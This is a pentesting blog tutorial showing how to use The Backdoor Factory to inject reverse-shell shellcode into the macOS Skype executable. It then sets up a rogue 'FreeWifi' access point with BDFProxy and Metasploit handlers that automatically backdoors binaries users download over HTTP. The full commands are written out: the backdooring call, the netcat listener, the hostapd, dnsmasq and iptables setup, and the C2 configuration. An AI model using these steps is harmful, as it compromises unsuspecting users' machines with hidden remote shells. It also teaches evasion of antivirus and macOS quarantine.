More Mach-O Backdoors for Pentesters (Now with BDFProxy!)

Yoyo! Last time we talked about building various custom scripts into native OS X applications. This time, we're going to be putting raw shell code into mach-o executables, via some awesome code caving methods! This is a great method and the tool simplifies the tedious process, BDF now supports Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), and Mach-O x86/x64, basically The Backdoor Factory project rocks! We're going to be building a simple Mach-O executable out of a popular app and repacking it with some reverse tcp shellcode, which is actually a great method for evading AV and general inspection, but will stick out with file integrity monitoring tools (like Midas).

Start by downloading and installing The Backdoor Factory:
git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
sudo sh install.sh
python backdoor.py --help

Now we are going to be backdooring the popular OS X application Skype (if you pull it down w/ a browser, it will be flagged with Quarantine. If you wget it [wget http://www.skype.com/go/getskype-macosx], you can run it without accepting the security risk; P.S. love that http download link, that will come into play later). Pull down the DMG, mount it, and drag the application to your Desktop. Next, we will launch the backdoor factory with the following command: 
python backdoor.py -f ~/Desktop/Skype.app/Contents/MacOS/Skype--shell=reverse_shell_tcp --hostip=127.0.0.1 --port=7777 -o Skype  -J

Now overwrite the old mach-o with your new backdoor:
cp ./backdoored/Skype ~/Desktop/Skype.app/Contents/MacOS/Skype

We will now start a netcat listener to grab the reverse shell:
nc -l 127.0.0.1 7777

Now run the application and grab your reverse shell :) Awesome! I've always wanted to backdoor Skype. To improve this method use some custom shellcode, preferably something with encryption to protect your shell on the wire. You may also have to accept the Quarantine risk, depending on the user's 'Security and Privacy Settings', regarding 'Allow apps downloaded from', and whether you could bypass it with a non-participating download application (lots of options here).

Next we are going to be using the BDFProxy, in conjunction with our rouge access point (from last week), to automatically backdoor binaries that go over http. We are also going to set up listeners for each of these shells in Metasploit automatically, basically creating an extremely hostile local wireless network. We will be doing the following in Kali Linux, so lets get started by pulling down BDFProxy and all of the rouge access point tools we need:

apt-get install bdfproxy hostapd dnsmasq wireless-tools iw wvdial

Lets set with setting up our rouge access point, just like last time, we should already have Internet via a nat passthrough from our kali vm to our host OS on eth0:

sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd

cat < /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/192.168.1.1
#address=/google.com/192.168.1.1
interface=wlan1
dhcp-range=192.168.1.10,192.168.1.250,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
#no-resolv
log-queries
EOF

service dnsmasq start

ifconfig wlan1 up
ifconfig wlan1 192.168.1.1/24

cat < /etc/hostapd/hostapd.conf
interface=wlan1
driver=nl80211
ssid=FreeWifi
channel=1
#Support for the Karma attack.
#enable_karma=1
EOF

iptables -X
iptables -F
iptables -A FORWARD -i wlan1 -o eth0 -s 192.168.1.1/24 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
iptables -t nat -A PREROUTING -i wlan1 -s 192.168.1.1/24 -p tcp --dport 80 -j REDIRECT --to-port 8080

service hostapd start

Before we start the BDFProxy, we need to edit the config file (vi /usr/share/bdfproxy/bdfproxy.cfg) to match our current setup, this means changing all of your C2 lines to: HOST = 192.168.1.1 #The C2
Finally, start the mitm-proxy: bdfproxy

Your going to have to watch this window, as any file it now comes across your rouge wireless network that is being downloaded over port 80 will start the regular Backdoor Factory interactive prompt, which involves choosing which codecave you want to put your shellcode in. It's important to remain aware of this window and keeping moving download through, as it will hold users' downloads in limbo while their files are being processed by the BDFProxy. You can also keep an eye on your log file for files that have come through by issuing:
tail -f /usr/share/bdfproxy/proxy.log

You will also want to launch metasploit with the proper resource file to automatically set up handlers for each backdoor implant you've prepared. To set up your handlers to receive your reverse shells simply issue: msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

Just like last time, for some more great ideas on which OS X mach-o applications to backdoor, check out this recent talk on OS X persistence via backdooring applications by The Backdoor Factory author himself, Joshua Pitts:



Theres always more than one way to skin a cat however. In this other post, my friend Chuancy Davenport shows you how to backdoor binaries on the fly using PDFProxy, but instead of using a rouge AP, he uses mitmf to launch an arp-spoof first!! It's another great way to get that man in the middle position you need to get your BDFProxy running, and he uses a totally different framework to get it working, so definitely a solid post to check out if your liking the BDFProxy mode.